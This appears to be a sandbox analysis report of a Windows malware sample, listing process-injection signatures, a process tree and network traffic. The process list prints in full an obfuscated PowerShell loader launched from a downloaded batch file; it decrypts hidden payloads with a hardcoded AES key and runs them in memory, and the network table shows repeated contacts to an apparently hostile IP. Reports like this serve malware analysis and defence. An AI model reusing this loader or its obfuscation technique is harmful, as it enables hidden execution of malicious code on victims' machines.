Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2760 wrote to memory of 3216 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 4232 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 1672 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 1672 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 1672 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 1672 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 1672 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 1672 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 1672 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 1672 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 1672 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3216 wrote to memory of 1672 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://193.222.96.114:7287/"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://193.222.96.114:7287/

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.0.2113838200\2137454564" -parentBuildID 20230214051806 -prefsHandle 1804 -prefMapHandle 1796 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b4496d3-b961-4367-be2b-11bc78c9419d} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 1896 1957bf0d758 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.1.676900925\1352277777" -parentBuildID 20230214051806 -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c76c319-dcf0-40cc-9c7a-59ff2a872f2a} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 2492 1956f28ab58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.2.1955429842\50283786" -childID 1 -isForBrowser -prefsHandle 2884 -prefMapHandle 2880 -prefsLen 23030 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7edeb2b6-6680-41c2-9aa1-80f696754c03} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 3008 1957ef23e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.3.2030326682\1267245035" -childID 2 -isForBrowser -prefsHandle 3636 -prefMapHandle 2652 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38990bfb-d9e2-4d6d-b0b3-89a119bed615} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 876 1956f240c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.4.655664972\1136452896" -childID 3 -isForBrowser -prefsHandle 5192 -prefMapHandle 5188 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e59930b-9b8a-435b-ae2b-c64aa350b799} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 5204 19582105958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.5.1505188768\1873080407" -childID 4 -isForBrowser -prefsHandle 5332 -prefMapHandle 5276 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4951e1c-d5dc-4a45-91be-aaea7cd8465c} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 5316 195821d2d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.6.561859453\338626641" -childID 5 -isForBrowser -prefsHandle 5496 -prefMapHandle 5500 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1754cb65-b6d0-41f8-a571-d9b77a71abf5} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 5488 195825e3258 tab

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\jiteon.xlsx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\GoGi.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Downloads\GoGi.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.7.56714659\332384980" -childID 6 -isForBrowser -prefsHandle 6176 -prefMapHandle 3440 -prefsLen 31048 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52b240d9-29ae-4b20-a32b-307ec711cfd1} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 5784 1957ef23858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.8.332503400\1079475351" -childID 7 -isForBrowser -prefsHandle 3592 -prefMapHandle 6520 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80472f49-da0d-4a38-ac53-2f65a412bf9f} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 6532 19580db2258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.9.2016357290\756116293" -childID 8 -isForBrowser -prefsHandle 6512 -prefMapHandle 10716 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdc2a477-be74-464a-8dc0-7fdaeac19329} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 10704 1957ef45058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.10.1896142811\464486275" -childID 9 -isForBrowser -prefsHandle 10556 -prefMapHandle 10548 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {00243c60-bd80-410f-a5e8-3d5eaf2038cd} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 10476 1958620f858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.11.1891116795\496201863" -childID 10 -isForBrowser -prefsHandle 9256 -prefMapHandle 9160 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a0f45a6-cd1e-458f-b06c-9d69b4d121c4} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 9856 195893a4e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.12.1425077980\1194327202" -childID 11 -isForBrowser -prefsHandle 6532 -prefMapHandle 6712 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a52ef1ca-483e-4849-8a7b-2d75c88a548d} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 5432 1958b26bb58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.13.387638766\2027148250" -childID 12 -isForBrowser -prefsHandle 9364 -prefMapHandle 9552 -prefsLen 31263 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd36cc27-0233-495e-a7f3-f05e68ab9d78} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 9340 1957b13dd58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.14.1601893434\1311254243" -childID 13 -isForBrowser -prefsHandle 6732 -prefMapHandle 3596 -prefsLen 31272 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e408baf-55ed-4979-b95f-b622f7890d19} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 6568 19586272958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3216.15.241436258\439829394" -childID 14 -isForBrowser -prefsHandle 5884 -prefMapHandle 5896 -prefsLen 31272 -prefMapSize 235121 -jsInitHandle 1252 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4be1162c-bcf4-428a-83d3-3619de0467ec} 3216 "\\.\pipe\gecko-crash-server-pipe.3216" 6676 1958ac62b58 tab

Network

Country Destination Domain Proto
N/A 127.0.0.1:60594 tcp
US 8.8.8.8:53 148.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 193.222.96.114:7287 193.222.96.114 tcp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
NL 193.222.96.114:7287 193.222.96.114 tcp
US 34.117.237.239:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.117.188.166:443 spocs.getpocket.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 44.239.14.124:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 114.96.222.193.in-addr.arpa udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 berryz.upnl.org udp
US 8.8.8.8:53 upnl.org udp
US 8.8.8.8:53 berryz.upnl.org udp
US 8.8.8.8:53 upnl.org udp
US 8.8.8.8:53 upnl.org udp
US 8.8.8.8:53 berryz.upnl.org udp
US 8.8.8.8:53 124.14.239.44.in-addr.arpa udp
US 8.8.8.8:53 206.221.208.4.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
N/A 127.0.0.1:60603 tcp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 aus5.mozilla.org udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.73:80 ciscobinary.openh264.org tcp
